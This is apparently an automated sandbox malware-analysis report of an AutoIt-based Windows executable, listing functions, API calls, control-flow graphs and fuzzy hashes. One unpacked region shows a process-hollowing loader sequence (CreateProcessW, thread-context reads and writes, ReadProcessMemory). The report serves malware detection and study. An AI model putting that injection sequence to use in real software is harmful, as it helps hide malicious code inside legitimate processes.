CloseHandle call e7039a 361->363 362->324 366 e70963-e70977 363->366 367 e70931-e7095d GetLastError call e5f2a3 call e65333 363->367 366->362 367->366
                                                      APIs
                                                        • Part of subcall function 00E7039A: CreateFileW.KERNELBASE(00000000,00000000,?,00E70704,?,?,00000000,?,00E70704,00000000,0000000C), ref: 00E703B7
                                                      • GetLastError.KERNEL32 ref: 00E7076F
                                                      • __dosmaperr.LIBCMT ref: 00E70776
                                                      • GetFileType.KERNELBASE(00000000), ref: 00E70782
                                                      • GetLastError.KERNEL32 ref: 00E7078C
                                                      • __dosmaperr.LIBCMT ref: 00E70795
                                                      • CloseHandle.KERNEL32(00000000), ref: 00E707B5
                                                      • CloseHandle.KERNEL32(?), ref: 00E708FF
                                                      • GetLastError.KERNEL32 ref: 00E70931
                                                      • __dosmaperr.LIBCMT ref: 00E70938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 8a522522add1e76a1bfab34d66de03d2ceafc9712bddbc67e029e9170328353c
                                                      • Instruction ID: 43eb7208c9d2a99d9ff96493280706b28443cdde7ef59bb8410730ffc8e24cec
                                                      • Opcode Fuzzy Hash: 8a522522add1e76a1bfab34d66de03d2ceafc9712bddbc67e029e9170328353c
                                                      • Instruction Fuzzy Hash: 51A13632A001498FDF19EF68D851BAE3BE1EB46324F14915DF819BB3A1CB319817DB91
                                                      Function 00E3344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00E33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F01418,?,00E32E7F,?,?,?,00000000), ref: 00E33A78
                                                        • Part of subcall function 00E33357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E33379
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E3356A
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E7318D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E731CE
                                                      • RegCloseKey.ADVAPI32(?), ref: 00E73210
                                                      • _wcslen.LIBCMT ref: 00E73277
                                                      • _wcslen.LIBCMT ref: 00E73286
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 259578bbcedbc402719ceb3b6bc1c50cea584b5e9a00565b0914ec57cae60f51
                                                      • Instruction ID: f775466c18d6affbbe1ae7313836f964a4a120d39efa63b125322c88da5d05bc
                                                      • Opcode Fuzzy Hash: 259578bbcedbc402719ceb3b6bc1c50cea584b5e9a00565b0914ec57cae60f51
                                                      • Instruction Fuzzy Hash: 8571E4714043049EC344DF69EC8ADABBBE8FF84340F50682EF589A31B1DB749A49DB61
                                                      Function 00E32B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E32B8E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E32B9D
                                                      • LoadIconW.USER32(00000063), ref: 00E32BB3
                                                      • LoadIconW.USER32(000000A4), ref: 00E32BC5
                                                      • LoadIconW.USER32(000000A2), ref: 00E32BD7
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E32BEF
                                                      • RegisterClassExW.USER32(?), ref: 00E32C40
                                                        • Part of subcall function 00E32CD4: GetSysColorBrush.USER32(0000000F), ref: 00E32D07
                                                        • Part of subcall function 00E32CD4: RegisterClassExW.USER32(00000030), ref: 00E32D31
                                                        • Part of subcall function 00E32CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E32D42
                                                        • Part of subcall function 00E32CD4: InitCommonControlsEx.COMCTL32(?), ref: 00E32D5F
                                                        • Part of subcall function 00E32CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E32D6F
                                                        • Part of subcall function 00E32CD4: LoadIconW.USER32(000000A9), ref: 00E32D85
                                                        • Part of subcall function 00E32CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E32D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 0ec59d6ef4e6d37d6c076ef5bf996af3b5d66a28d72b77db009884ef64b8f425
                                                      • Instruction ID: 4f26902a68b631852a0db10fa0fae4e1acbbd742f97189c2185bf8b0d7f3bbf1
                                                      • Opcode Fuzzy Hash: 0ec59d6ef4e6d37d6c076ef5bf996af3b5d66a28d72b77db009884ef64b8f425
                                                      • Instruction Fuzzy Hash: E5211A70E00318AFDB109FA6EC59AAA7FF5FB48B50F14002AF504B67A0D7B14555EF90
                                                      Function 00E33170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 445 e33170-e33185 446 e33187-e3318a 445->446 447 e331e5-e331e7 445->447 449 e331eb 446->449 450 e3318c-e33193 446->450 447->446 448 e331e9 447->448 451 e331d0-e331d8 DefWindowProcW 448->451 452 e331f1-e331f6 449->452 453 e72dfb-e72e23 call e318e2 call e4e499 449->453 454 e33265-e3326d PostQuitMessage 450->454 455 e33199-e3319e 450->455 461 e331de-e331e4 451->461 456 e331f8-e331fb 452->456 457 e3321d-e33244 SetTimer RegisterWindowMessageW 452->457 491 e72e28-e72e2f 453->491 462 e33219-e3321b 454->462 459 e331a4-e331a8 455->459 460 e72e7c-e72e90 call e9bf30 455->460 463 e33201-e33214 KillTimer call e330f2 call e33c50 456->463 464 e72d9c-e72d9f 456->464 457->462 466 e33246-e33251 CreatePopupMenu 457->466 467 e331ae-e331b3 459->467 468 e72e68-e72e77 call e9c161 459->468 460->462 486 e72e96 460->486 462->461 463->462 470 e72dd7-e72df6 MoveWindow 464->470 471 e72da1-e72da5 464->471 466->462 475 e72e4d-e72e54 467->475 476 e331b9-e331be 467->476 468->462 470->462 478 e72da7-e72daa 471->478 479 e72dc6-e72dd2 SetFocus 471->479 475->451 480 e72e5a-e72e63 call e90ad7 475->480 484 e33253-e33263 call e3326f 476->484 485 e331c4-e331ca 476->485 478->485 487 e72db0-e72dc1 call e318e2 478->487 479->462 480->451 484->462 485->451 485->491 486->451 487->462 491->451 495 e72e35-e72e48 call e330f2 call e33837 491->495 495->451
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E3316A,?,?), ref: 00E331D8
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00E3316A,?,?), ref: 00E33204
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E33227
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E3316A,?,?), ref: 00E33232
                                                      • CreatePopupMenu.USER32 ref: 00E33246
                                                      • PostQuitMessage.USER32(00000000), ref: 00E33267
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 08fd5d18d4efeac514ca328b2e7598d3bfd84aeb6421e7dc0aca0e92fd955f42
                                                      • Instruction ID: c44e2ca65a258e0d6253abcb2a0c4a8db98934938697a591c013adcf86d4dfc5
                                                      • Opcode Fuzzy Hash: 08fd5d18d4efeac514ca328b2e7598d3bfd84aeb6421e7dc0aca0e92fd955f42
                                                      • Instruction Fuzzy Hash: EA413B35600204ABDB141B789D0DFBA3E99F705348F14712AFA0AB61F2C7718E41E761
                                                      Function 014892F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 501 14892f0-148939e call 1486d20 504 14893a5-14893cb call 148a200 CreateFileW 501->504 507 14893cd 504->507 508 14893d2-14893e2 504->508 509 148951d-1489521 507->509 513 14893e9-1489403 VirtualAlloc 508->513 514 14893e4 508->514 511 1489563-1489566 509->511 512 1489523-1489527 509->512 515 1489569-1489570 511->515 516 1489529-148952c 512->516 517 1489533-1489537 512->517 518 148940a-1489421 ReadFile 513->518 519 1489405 513->519 514->509 520 1489572-148957d 515->520 521 14895c5-14895da 515->521 516->517 522 1489539-1489543 517->522 523 1489547-148954b 517->523 528 1489428-1489468 VirtualAlloc 518->528 529 1489423 518->529 519->509 530 148957f 520->530 531 1489581-148958d 520->531 524 14895ea-14895f2 521->524 525 14895dc-14895e7 VirtualFree 521->525 522->523 526 148955b 523->526 527 148954d-1489557 523->527 525->524 526->511 527->526 532 148946a 528->532 533 148946f-148948a call 148a450 528->533 529->509 530->521 534 148958f-148959f 531->534 535 14895a1-14895ad 531->535 532->509 541 1489495-148949f 533->541 537 14895c3 534->537 538 14895ba-14895c0 535->538 539 14895af-14895b8 535->539 537->515 538->537 539->537 542 14894a1-14894d0 call 148a450 541->542 543 14894d2-14894e6 call 148a260 541->543 542->541 549 14894e8 543->549 550 14894ea-14894ee 543->550 549->509 551 14894fa-14894fe 550->551 552 14894f0-14894f4 CloseHandle 550->552 553 148950e-1489517 551->553 554 1489500-148950b VirtualFree 551->554 552->551 553->504 553->509 554->553
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014893C1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014895E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction ID: f6f2f649f1f32eb807449dd1fee1b2282b63ab9598197d0643ed8e8651fdfb82
                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction Fuzzy Hash: CEA11C71E04209EBDF14DFA8C854BEEB7B5BF88708F20855AE101BB291C7759A41CF64
                                                      Function 00E32C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 565 e32c63-e32cd3 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E32C91
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E32CB2
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E31CAD,?), ref: 00E32CC6
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E31CAD,?), ref: 00E32CCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: ac28bc46c7f0ad97c52f2643819f8830825e15a3f52f4c69ad8e0fa351f442f7
                                                      • Instruction ID: 3a42c09c4b68fda2bc1821765cb25e45bf7190b66d6eca71938d2003a65e3036
                                                      • Opcode Fuzzy Hash: ac28bc46c7f0ad97c52f2643819f8830825e15a3f52f4c69ad8e0fa351f442f7
                                                      • Instruction Fuzzy Hash: 15F0DA755403987AEB311727AC09E773EBDF7C6F50B10106EF904A25A0C6721855EAB0
                                                      Function 014890D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 680 14890d0-14891ec call 1486d20 call 1488fc0 CreateFileW 687 14891ee 680->687 688 14891f3-1489203 680->688 689 14892a3-14892a8 687->689 691 148920a-1489224 VirtualAlloc 688->691 692 1489205 688->692 693 1489228-148923f ReadFile 691->693 694 1489226 691->694 692->689 695 1489241 693->695 696 1489243-148927d call 1489000 call 1487fc0 693->696 694->689 695->689 701 1489299-14892a1 ExitProcess 696->701 702 148927f-1489294 call 1489050 696->702 701->689 702->701
                                                      APIs
                                                        • Part of subcall function 01488FC0: Sleep.KERNELBASE(000001F4), ref: 01488FD1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014891E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: Q25JD1MADU
                                                      • API String ID: 2694422964-125274971
                                                      • Opcode ID: 1342e24205fffa63b6142138501ae720455a20c905fd218755f02880085bd0a5
                                                      • Instruction ID: a667ffd1285a72f3d7008811d952a019e1fd43fbcab91ce0e13827c0dcfcde5a
                                                      • Opcode Fuzzy Hash: 1342e24205fffa63b6142138501ae720455a20c905fd218755f02880085bd0a5
                                                      • Instruction Fuzzy Hash: 9551BE31D00249EBEF11EBA4C815BEFBB79EF58300F004599E609BB2D0D6795B85CBA5
                                                      Function 00E33B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 740 e33b1c-e33b27 741 e33b99-e33b9b 740->741 742 e33b29-e33b2e 740->742 743 e33b8c-e33b8f 741->743 742->741 744 e33b30-e33b48 RegOpenKeyExW 742->744 744->741 745 e33b4a-e33b69 RegQueryValueExW 744->745 746 e33b80-e33b8b RegCloseKey 745->746 747 e33b6b-e33b76 745->747 746->743 748 e33b90-e33b97 747->748 749 e33b78-e33b7a 747->749 750 e33b7e 748->750 749->750 750->746
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B40
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B61
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 6f62645042fef81cf88f349385afdeb01e827d8175e5c58300968d3bb3828a36
                                                      • Instruction ID: 4c958ef63c8fd51a11b97ab6266fb044bf22f6c06ffcf3074815e314cd049ac8
                                                      • Opcode Fuzzy Hash: 6f62645042fef81cf88f349385afdeb01e827d8175e5c58300968d3bb3828a36
                                                      • Instruction Fuzzy Hash: 651127B5610208FFDB208FA5DC89EEEBBB9EF04744F10946AF805E7110E2319E45DBA0
                                                      Function 01487FC0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 751 1487fc0-1488060 call 148a430 * 3 758 1488062-148806c 751->758 759 1488077 751->759 758->759 760 148806e-1488075 758->760 761 148807e-1488087 759->761 760->761 762 148808e-1488740 761->762 763 1488742-1488746 762->763 764 1488753-1488780 CreateProcessW 762->764 765 1488748-148874c 763->765 766 148878c-14887b9 763->766 770 148878a 764->770 771 1488782-1488785 764->771 768 148874e 765->768 769 14887c5-14887f2 765->769 786 14887bb-14887be 766->786 787 14887c3 766->787 773 14887fc-1488816 Wow64GetThreadContext 768->773 769->773 789 14887f4-14887f7 769->789 770->773 776 1488b81-1488b83 771->776 774 1488818 773->774 775 148881d-1488838 ReadProcessMemory 773->775 778 1488b2a-1488b2e 774->778 779 148883a 775->779 780 148883f-1488848 775->780 784 1488b7f 778->784 785 1488b30-1488b34 778->785 779->778 782 148884a-1488859 780->782 783 1488871-1488890 call 1489ab0 780->783 782->783 790 148885b-148886a call 1489a00 782->790 802 1488892 783->802 803 1488897-14888ba call 1489bf0 783->803 784->776 791 1488b49-1488b4d 785->791 792 1488b36-1488b42 785->792 786->776 787->773 789->776 790->783 807 148886c 790->807 796 1488b59-1488b5d 791->796 797 1488b4f-1488b52 791->797 792->791 798 1488b69-1488b6d 796->798 799 1488b5f-1488b62 796->799 797->796 805 1488b7a-1488b7d 798->805 806 1488b6f-1488b75 call 1489a00 798->806 799->798 802->778 810 14888bc-14888c3 803->810 811 1488904-1488925 call 1489bf0 803->811 805->776 806->805 807->778 812 14888ff 810->812 813 14888c5-14888f6 call 1489bf0 810->813 818 148892c-148894a call 148a450 811->818 819 1488927 811->819 812->778 820 14888f8 813->820 821 14888fd 813->821 824 1488955-148895f 818->824 819->778 820->778 821->811 825 1488961-1488993 call 148a450 824->825 826 1488995-1488999 824->826 825->824 828 148899f-14889af 826->828 829 1488a84-1488aa1 call 1489600 826->829 828->829 832 14889b5-14889c5 828->832 836 1488aa8-1488ac7 Wow64SetThreadContext 829->836 837 1488aa3 829->837 832->829 835 14889cb-14889ef 832->835 838 14889f2-14889f6 835->838 839 1488ac9 836->839 840 1488acb-1488ad6 call 1489930 836->840 837->778 838->829 841 14889fc-1488a11 838->841 839->778 847 1488ad8 840->847 848 1488ada-1488ade 840->848 843 1488a25-1488a29 841->843 845 1488a2b-1488a37 843->845 846 1488a67-1488a7f 843->846 849 1488a39-1488a63 845->849 850 1488a65 845->850 846->838 847->778 852 1488aea-1488aee 848->852 853 1488ae0-1488ae3 848->853 849->850 850->843 854 1488afa-1488afe 852->854 855 1488af0-1488af3 852->855 853->852 856 1488b0a-1488b0e 854->856 857 1488b00-1488b03 854->857 855->854 858 1488b1b-1488b24 856->858 859 1488b10-1488b16 call 1489a00 856->859 857->856 858->762 858->778 859->858
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0148877B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01488811
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01488833
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                      • Instruction ID: 4545804215939f38ece5e646258ddc520e26ba89e8e66002535de5a115174789
                                                      • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                      • Instruction Fuzzy Hash: 41621C30A14259DBEB24DFA4C840BDEB772EF58300F5091A9D20DEB3A0E7759E81CB59
                                                      Function 00E3DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00E832B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: 7de5ddec63003b66e26d695cb37dc4a4dc009491a69a9d4a413f86e21ce95f09
                                                      • Instruction ID: df75ce2a9bc60057661a3ef3e9203b6546253b97306c65460ff3b9f429db447f
                                                      • Opcode Fuzzy Hash: 7de5ddec63003b66e26d695cb37dc4a4dc009491a69a9d4a413f86e21ce95f09
                                                      • Instruction Fuzzy Hash: 88C28B71A00204CFCB24DF68C889AADBBF1BF08714F249569E95ABB391D375ED41CB91
                                                      Function 00E33923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1371 e33923-e33939 1372 e33a13-e33a17 1371->1372 1373 e3393f-e33954 call e36270 1371->1373 1376 e73393-e733a2 LoadStringW 1373->1376 1377 e3395a-e33976 call e36b57 1373->1377 1379 e733ad-e733b6 1376->1379 1383 e733c9-e733e5 call e36350 call e33fcf 1377->1383 1384 e3397c-e33980 1377->1384 1381 e33994-e33a0e call e52340 call e33a18 call e54983 Shell_NotifyIconW call e3988f 1379->1381 1382 e733bc-e733c4 call e3a8c7 1379->1382 1381->1372 1382->1381 1383->1381 1397 e733eb-e73409 call e333c6 call e33fcf call e333c6 1383->1397 1384->1379 1388 e33986-e3398f call e36350 1384->1388 1388->1381 1397->1381
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E733A2
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E33A04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line:
                                                      • API String ID: 2289894680-1585850449
                                                      • Opcode ID: e883b25ae2f3f0d25798b74a984da329bf5ded5d6f83dc534eeac8c643cbee7b
                                                      • Instruction ID: 02239cfbc4f377713418315f272240cee5dacae34a722a99cd6d83b71b3d0846
                                                      • Opcode Fuzzy Hash: e883b25ae2f3f0d25798b74a984da329bf5ded5d6f83dc534eeac8c643cbee7b
                                                      • Instruction Fuzzy Hash: 3031A371508304ABD725EB30DC49FEBBBE8BB84714F10A92EF599A20D1DB709649D7C2
                                                      Function 00E32DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00E72C8C
